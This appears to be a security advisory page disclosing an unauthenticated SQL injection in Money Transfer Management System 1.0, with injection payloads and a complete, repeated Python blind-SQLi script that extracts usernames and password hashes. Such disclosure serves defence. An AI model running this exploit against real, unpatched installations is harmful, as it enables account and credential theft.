Money Transfer Management System 1.0 - Unauthenticated SQLi
7.5
High
Discovered by
Offensive Team, Fluid Attacks
Summary
Full name
Money Transfer Management System - Unauthenticated SQL Injection
Code name
State
Public
Release date
Mar 15, 2022
Affected product
Money Transfer Management System
Affected version(s)
Version 1.0
Vulnerability name
SQL injection
Vulnerability type
Remotely exploitable
Yes
CVSS v3.1 vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS v3.1 base score
7.5
Exploit available
Yes
CVE ID(s)
Description
Money Transfer Management System Version 1.0 allows an unauthenticated user to inject SQL queries in admin/maintenance/manage_branch.php and admin/maintenance/manage_fee.php via the id parameter.
Proof of Concept
Steps to reproduce
Go to
http://127.0.0.1/mtms/admin/maintenance/manage_branch.phpInsert the following query inside the
idparameter.?id=1' and 1=1 -- -
?id=1' and 1=1 -- -
?id=1' and 1=1 -- -
?id=1' and 1=1 -- -
The server response changes if the second part of the query is true or false. To automate the process use the below exploit.
System Information
Version: Money Transfer Management System version 1.0.
Operating System: Linux.
Web Server: Apache
PHP Version: 7.4
Database and version: MySQL
Exploit
import requests import urllib.parse dictionary = """0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~""" def sqli_bool(base_url,query): url = "?id=1' and %s -- -" % query #proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'} #r = requests.get(base_url+url, proxies=proxies) r = requests.get(base_url+url) if len(r.text) > 2700: return True else: return False def get_length(url, query): for i in range(0,200): current_query = "(length((%s))=%s)"%(query,str(i)) current_query = current_query=urllib.parse.quote(current_query) if sqli_bool(url,current_query): break if i !=199: return i else: return -1 def make_query(url,query): # Get length length = get_length(url,query) print("[*] Getting output length:") if length == -1: print("Error getting query length") return 0 print("[+] Output Length: " + str(length)) current_result = "" print() print("[*] Getting output: ") for pos in range(length+1): for char in dictionary: current_query = '(substr((%s),%s,1)="%s")' %(query,str(pos),requests.utils.quote(char)) if sqli_bool(url,current_query): current_result += char print(current_result, end='\r') break print("[+] Found: " + " " * 100) print(current_result) url = "http://127.0.0.1/mtms/admin/maintenance/manage_branch.php" # must be only 1 row # use limit and offset to iterate # CHANGE THIS query = "select concat(username,':', password) as t1 from users limit 1" make_query(url,query)
import requests import urllib.parse dictionary = """0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~""" def sqli_bool(base_url,query): url = "?id=1' and %s -- -" % query #proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'} #r = requests.get(base_url+url, proxies=proxies) r = requests.get(base_url+url) if len(r.text) > 2700: return True else: return False def get_length(url, query): for i in range(0,200): current_query = "(length((%s))=%s)"%(query,str(i)) current_query = current_query=urllib.parse.quote(current_query) if sqli_bool(url,current_query): break if i !=199: return i else: return -1 def make_query(url,query): # Get length length = get_length(url,query) print("[*] Getting output length:") if length == -1: print("Error getting query length") return 0 print("[+] Output Length: " + str(length)) current_result = "" print() print("[*] Getting output: ") for pos in range(length+1): for char in dictionary: current_query = '(substr((%s),%s,1)="%s")' %(query,str(pos),requests.utils.quote(char)) if sqli_bool(url,current_query): current_result += char print(current_result, end='\r') break print("[+] Found: " + " " * 100) print(current_result) url = "http://127.0.0.1/mtms/admin/maintenance/manage_branch.php" # must be only 1 row # use limit and offset to iterate # CHANGE THIS query = "select concat(username,':', password) as t1 from users limit 1" make_query(url,query)
import requests import urllib.parse dictionary = """0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~""" def sqli_bool(base_url,query): url = "?id=1' and %s -- -" % query #proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'} #r = requests.get(base_url+url, proxies=proxies) r = requests.get(base_url+url) if len(r.text) > 2700: return True else: return False def get_length(url, query): for i in range(0,200): current_query = "(length((%s))=%s)"%(query,str(i)) current_query = current_query=urllib.parse.quote(current_query) if sqli_bool(url,current_query): break if i !=199: return i else: return -1 def make_query(url,query): # Get length length = get_length(url,query) print("[*] Getting output length:") if length == -1: print("Error getting query length") return 0 print("[+] Output Length: " + str(length)) current_result = "" print() print("[*] Getting output: ") for pos in range(length+1): for char in dictionary: current_query = '(substr((%s),%s,1)="%s")' %(query,str(pos),requests.utils.quote(char)) if sqli_bool(url,current_query): current_result += char print(current_result, end='\r') break print("[+] Found: " + " " * 100) print(current_result) url = "http://127.0.0.1/mtms/admin/maintenance/manage_branch.php" # must be only 1 row # use limit and offset to iterate # CHANGE THIS query = "select concat(username,':', password) as t1 from users limit 1" make_query(url,query)
import requests import urllib.parse dictionary = """0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~""" def sqli_bool(base_url,query): url = "?id=1' and %s -- -" % query #proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'} #r = requests.get(base_url+url, proxies=proxies) r = requests.get(base_url+url) if len(r.text) > 2700: return True else: return False def get_length(url, query): for i in range(0,200): current_query = "(length((%s))=%s)"%(query,str(i)) current_query = current_query=urllib.parse.quote(current_query) if sqli_bool(url,current_query): break if i !=199: return i else: return -1 def make_query(url,query): # Get length length = get_length(url,query) print("[*] Getting output length:") if length == -1: print("Error getting query length") return 0 print("[+] Output Length: " + str(length)) current_result = "" print() print("[*] Getting output: ") for pos in range(length+1): for char in dictionary: current_query = '(substr((%s),%s,1)="%s")' %(query,str(pos),requests.utils.quote(char)) if sqli_bool(url,current_query): current_result += char print(current_result, end='\r') break print("[+] Found: " + " " * 100) print(current_result) url = "http://127.0.0.1/mtms/admin/maintenance/manage_branch.php" # must be only 1 row # use limit and offset to iterate # CHANGE THIS query = "select concat(username,':', password) as t1 from users limit 1" make_query(url,query)
Mitigation
By 2022-03-15 there is not a patch resolving the issue.
References
Timeline
Feb 15, 2022
Vulnerability discovered
Feb 15, 2022
Vendor contacted
Mar 15, 2022
Public disclosure
Does your application use this vulnerable software?
During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.
Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.
Get an AI summary of Fluid Attacks
Targets
Subscribe to our newsletter
Stay updated on our upcoming events and latest blog posts, advisories and other engaging resources.
© 2026 Fluid Attacks. We hack your software.
Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.
Targets
Subscribe to our newsletter
Stay updated on our upcoming events and latest blog posts, advisories and other engaging resources.
Get an AI summary of Fluid Attacks
© 2026 Fluid Attacks. We hack your software.
Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.
Targets
Subscribe to our newsletter
Stay updated on our upcoming events and latest blog posts, advisories and other engaging resources.
Get an AI summary of Fluid Attacks
© 2026 Fluid Attacks. We hack your software.
Meet us at RSA Conference™ 2026 at booth N-4614! Book a demo on-site.
Meet us at RSA Conference™ 2026 at booth N-4614! Book a demo on-site.
Meet us at RSA Conference™ 2026 at booth N-4614! Book a demo on-site.